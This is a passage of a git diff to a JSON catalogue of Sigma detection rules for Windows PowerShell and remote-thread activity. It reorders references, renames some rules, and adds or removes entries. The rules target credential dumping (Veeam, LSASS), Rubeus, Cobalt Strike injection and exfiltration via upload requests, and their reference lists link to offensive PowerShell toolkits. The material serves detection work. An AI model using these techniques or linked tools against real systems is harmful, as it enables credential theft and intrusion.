- "attack.privilege_escalation",
- "attack.t1546.013"
- ]
- },
- "related": [
- {
- "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152",
- "value": "Powershell Trigger Profiles by Add_Content"
- },
{
"description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet",
"meta": {
@@ -28675,8 +28359,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://twitter.com/WindowsDocs/status/1620078135080325122",
+ "https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_install_unsigned_appx_packages.yml"
],
"tags": [
@@ -28866,8 +28550,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/JohnLaTwC/status/850381440629981184",
"https://t.co/ezOTGy1a1G",
+ "https://twitter.com/JohnLaTwC/status/850381440629981184",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml"
],
"tags": [
@@ -28935,8 +28619,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps",
"https://twitter.com/NathanMcNulty/status/1569497348841287681",
+ "https://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml"
],
"tags": [
@@ -29101,8 +28785,8 @@
"logsource.product": "windows",
"refs": [
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
- "https://github.com/samratashok/ADModule",
"https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml"
],
"tags": [
@@ -29196,8 +28880,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md",
"https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml"
],
"tags": [
@@ -29416,8 +29100,8 @@
"logsource.product": "windows",
"refs": [
"https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml"
],
"tags": [
@@ -29770,8 +29454,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting",
+ "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml"
],
"tags": [
@@ -29939,8 +29623,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml"
],
"tags": [
@@ -29994,6 +29678,30 @@
"uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81",
"value": "Create Volume Shadow Copy with Powershell"
},
+ {
+ "description": "Detects execution of a PowerShell script that contains calls to the \"Veeam.Backup\" class, in order to dump stored credentials.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": [
+ "Administrators backup scripts (must be investigated)"
+ ],
+ "filename": "posh_ps_veeam_credential_dumping_script.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/",
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml"
+ ],
+ "tags": [
+ "attack.credential_access"
+ ]
+ },
+ "uuid": "976d6e6f-a04b-4900-9713-0134a353e38b",
+ "value": "Veeam Backup Servers Credential Dumping Script Execution"
+ },
{
"description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.",
"meta": {
@@ -30007,8 +29715,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml"
],
"tags": [
@@ -30064,9 +29772,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/oroneequalsone/status/1568432028361830402",
"https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md",
+ "https://twitter.com/oroneequalsone/status/1568432028361830402",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml"
],
"tags": [
@@ -30186,9 +29894,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
"https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
- "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml"
],
"tags": [
@@ -30256,8 +29964,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso",
"https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml"
],
"tags": [
@@ -30323,8 +30031,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml"
],
"tags": [
@@ -30357,8 +30065,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml"
],
"tags": [
@@ -30628,8 +30336,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/harleyQu1nn/AggressorScripts",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml"
],
"tags": [
@@ -30759,15 +30467,15 @@
"value": "Suspicious Mount-DiskImage"
},
{
- "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework",
+ "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework",
"meta": {
- "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)",
+ "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)",
"creation_date": "2019/02/11",
"falsepositive": [
"Unknown"
],
"filename": "posh_ps_susp_keywords.yml",
- "level": "high",
+ "level": "medium",
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
@@ -30792,7 +30500,7 @@
}
],
"uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf",
- "value": "Suspicious PowerShell Keywords"
+ "value": "Potential Suspicious PowerShell Keywords"
},
{
"description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data",
@@ -30841,8 +30549,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
- "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml"
],
"tags": [
@@ -30898,8 +30606,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy",
"https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml"
],
"tags": [
@@ -30932,8 +30640,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml"
],
"tags": [
@@ -31108,8 +30816,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
"https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml"
],
"tags": [
@@ -31208,10 +30916,10 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/ScumBots/status/1610626724257046529",
- "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content",
- "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0",
"https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content",
+ "https://twitter.com/ScumBots/status/1610626724257046529",
+ "https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0",
+ "https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml"
],
"tags": [
@@ -31345,8 +31053,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml"
],
"tags": "No established tags"
@@ -31409,19 +31117,22 @@
"logsource.product": "windows",
"refs": [
"https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
- "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
- "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
- "https://github.com/calebstewart/CVE-2021-1675",
- "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
- "https://github.com/HarmJ0y/DAMP",
- "https://github.com/samratashok/nishang",
- "https://github.com/DarkCoderSc/PowerRunAsSystem/",
- "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
- "https://github.com/besimorhino/powercat",
- "https://adsecurity.org/?p=2921",
- "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
"https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
+ "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
+ "https://github.com/adrecon/ADRecon",
+ "https://github.com/HarmJ0y/DAMP",
+ "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
+ "https://github.com/calebstewart/CVE-2021-1675",
+ "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
+ "https://github.com/samratashok/nishang",
+ "https://github.com/besimorhino/powercat",
+ "https://adsecurity.org/?p=2921",
+ "https://github.com/Kevin-Robertson/Powermad",
+ "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
+ "https://github.com/DarkCoderSc/PowerRunAsSystem/",
+ "https://github.com/adrecon/AzureADRecon",
+ "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
"https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml"
],
@@ -31554,9 +31265,9 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://www.shellhacks.com/clear-history-powershell/",
- "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics",
"https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/",
+ "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics",
+ "https://www.shellhacks.com/clear-history-powershell/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml"
],
"tags": [
@@ -31584,6 +31295,58 @@
"uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7",
"value": "Clearing Windows Console History"
},
+ {
+ "description": "Detects the execution of the hacktool Rubeus using specific command line flags",
+ "meta": {
+ "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)",
+ "creation_date": "2023/04/27",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "posh_ps_hktl_rubeus.yml",
+ "level": "high",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html",
+ "https://github.com/GhostPack/Rubeus",
+ "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003",
+ "attack.t1558.003",
+ "attack.lateral_movement",
+ "attack.t1550.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "3245cd30-e015-40ff-a31d-5cadd5f377ec",
+ "value": "HackTool - Rubeus Execution - ScriptBlock"
+ },
{
"description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n",
"meta": {
@@ -31705,8 +31468,8 @@
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml"
],
"tags": "No established tags"
@@ -31969,8 +31732,8 @@
"logsource.category": "ps_script",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
"https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml"
],
"tags": [
@@ -31990,41 +31753,6 @@
"uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85",
"value": "Powershell WMI Persistence"
},
- {
- "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/01/07",
- "falsepositive": [
- "Legitimate script"
- ],
- "filename": "posh_ps_upload.yml",
- "level": "medium",
- "logsource.category": "ps_script",
- "logsource.product": "windows",
- "refs": [
- "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html",
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.t1020"
- ]
- },
- "related": [
- {
- "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb",
- "value": "Windows PowerShell Upload Web Request"
- },
{
"description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n",
"meta": {
@@ -32309,6 +32037,41 @@
"uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7",
"value": "Invoke-Obfuscation Via Stdin - Powershell"
},
+ {
+ "description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/07",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "posh_ps_script_with_upload_capabilities.yml",
+ "level": "low",
+ "logsource.category": "ps_script",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2",
+ "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb",
+ "value": "PowerShell Script With File Upload Capabilities"
+ },
{
"description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.",
"meta": {
@@ -32375,40 +32138,6 @@
"uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c",
"value": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools"
},
- {
- "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons",
- "meta": {
- "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community",
- "creation_date": "2018/11/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f",
- "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1055.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "f4599aa0-4f85-4a32-80ea-fc39dc965945",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42",
- "value": "CobaltStrike Process Injection"
- },
{
"description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n",
"meta": {
@@ -32443,6 +32172,40 @@
"uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505",
"value": "Password Dumper Remote Thread in LSASS"
},
+ {
+ "description": "Detects uncommon target processes for remote thread creation",
+ "meta": {
+ "author": "Florian Roth (Nextron Systems)",
+ "creation_date": "2022/03/16",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "create_remote_thread_win_uncommon_target_image.yml",
+ "level": "high",
+ "logsource.category": "create_remote_thread",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_uncommon_target_image.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1055.003"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "41d9846c-f6af-4302-a654-24bba2729bc6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "a1a144b7-5c9b-4853-a559-2172be8d4a03",
+ "value": "Remote Thread Creation In Uncommon Target Image"
+ },
{
"description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process",
"meta": {
@@ -32451,13 +32214,13 @@
"falsepositive": [
"Unknown"
],
- "filename": "create_remote_thread_win_powershell_crt_rundll32.yml",
+ "filename": "create_remote_thread_win_powershell_susp_targets.yml",
"level": "high",
"logsource.category": "create_remote_thread",
"logsource.product": "windows",
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_crt_rundll32.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml"
],
"tags": [
"attack.defense_evasion",
@@ -32486,131 +32249,22 @@
"value": "Remote Thread Creation Via PowerShell In Rundll32"
},
{
- "description": "Detects remote thread injection events based on action seen used by bumblebee",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2022/09/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "create_remote_thread_win_bumblebee.yml",
- "level": "high",
- "logsource.category": "create_remote_thread",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_bumblebee.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1218.011",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "994cac2b-92c2-44bf-8853-14f6ca39fbda",
- "value": "Bumblebee Remote Thread Creation"
- },
- {
- "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"",
- "meta": {
